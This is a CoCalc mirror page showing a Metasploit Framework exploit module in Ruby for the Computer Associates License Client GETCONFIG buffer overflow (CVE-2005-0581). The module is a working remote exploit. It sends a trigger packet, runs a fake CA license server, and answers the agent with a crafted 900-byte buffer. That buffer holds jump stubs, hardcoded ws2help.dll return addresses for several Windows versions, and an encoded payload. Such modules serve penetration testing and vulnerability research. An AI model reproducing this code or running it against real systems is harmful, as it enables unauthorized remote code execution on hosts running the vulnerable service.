Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/license/calicclnt_getconfig.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Computer Associates License Client GETCONFIG Overflow',
16
'Description' => %q{
17
This module exploits a vulnerability in the CA License Client
18
service. This exploit will only work if your IP address can be
19
resolved from the target system point of view. This can be
20
accomplished on a local network by running the 'nmbd' service
21
that comes with Samba. If you are running this exploit from
22
Windows and do not filter udp port 137, this should not be a
23
problem (if the target is on the same network segment). Due to
24
the bugginess of the software, you are only allowed one connection
25
to the agent port before it starts ignoring you. If it wasn't for this
26
issue, it would be possible to repeatedly exploit this bug.
27
},
28
'Author' => [
29
'hdm', # original msf v2 module
30
'aushack', # msf v3 port :)
31
],
32
'License' => MSF_LICENSE,
33
'References' => [
34
[ 'CVE', '2005-0581' ],
35
[ 'OSVDB', '14389' ],
36
[ 'BID', '12705' ],
37
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
38
],
39
'Privileged' => true,
40
'DefaultOptions' => {
41
'EXITFUNC' => 'process',
42
},
43
'Payload' => {
44
'Space' => 600,
45
'BadChars' => "\x00\x20",
46
'StackAdjustment' => -3500,
47
48
},
49
'Platform' => 'win',
50
'Targets' => [
51
# As much as I would like to return back to the DLL or EXE,
52
# all of those modules have a leading NULL in the
53
# loaded @ address :(
54
# name, jmp esi, writable, jmp edi
55
# ['Automatic', {} ],
56
#
57
# aushack - tested OK Windows XP English SP0-1 only 20100214
58
['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
59
['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
60
['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
61
['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
62
],
63
'DisclosureDate' => '2005-03-02',
64
'Notes' => {
65
'Reliability' => UNKNOWN_RELIABILITY,
66
'Stability' => UNKNOWN_STABILITY,
67
'SideEffects' => UNKNOWN_SIDE_EFFECTS
68
}
69
)
70
)
71
72
register_options(
73
[
74
Opt::RPORT(10203),
75
OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),
76
]
77
)
78
end
79
80
# def check
81
# It is possible to check, but due to a software bug, checking prevents exploitation
82
# end
83
84
def exploit
85
if (connect)
86
sock.put("A0 GETSERVER<EOM>\n")
87
print_status("Initial packet sent to remote agent...")
88
disconnect
89
90
fakecaservice = Rex::Socket::TcpServer.create(
91
'LocalHost' => '0.0.0.0',
92
'LocalPort' => datastore['SRVPORT'],
93
'SSL' => false,
94
'Context' =>
95
{
96
'Msf' => framework,
97
'MsfExploit' => self,
98
}
99
)
100
101
add_socket(fakecaservice)
102
103
fakecaservice.start
104
print_status("Waiting for the license agent to connect back...")
105
begin
106
Timeout.timeout(3) do
107
done = false
108
while (not done and session = fakecaservice.accept)
109
print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")
110
session.put("A0 GETCONFIG SELF 0<EOM>")
111
req = session.recvfrom(2000)[0]
112
next if not req
113
next if req.empty?
114
115
if (req =~ /OS\<([^\>]+)/)
116
print_status("Target reports OS: #{$1}")
117
end
118
119
# exploits two different versions at once >:-)
120
# 144 -> return address of esi points to string middle
121
# 196 -> return address of edi points to string beginning
122
# 148 -> avoid exception by patching with writable address
123
# 928 -> seh handler (not useful under XP SP2)
124
buff = rand_text_alphanumeric(900)
125
buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses
126
buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi
127
buff[148, 4] = [target['Rets'][1]].pack('V') # writable address
128
buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address
129
buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi
130
buff[272, payload.encoded.length] = payload.encoded
131
132
sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
133
session.put(sploit)
134
session.close
135
end
136
end
137
ensure
138
handler
139
fakecaservice.close
140
return
141
end
142
end
143
end
144
end
145
146
=begin
147
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
148
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
149
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
150
=end
151
152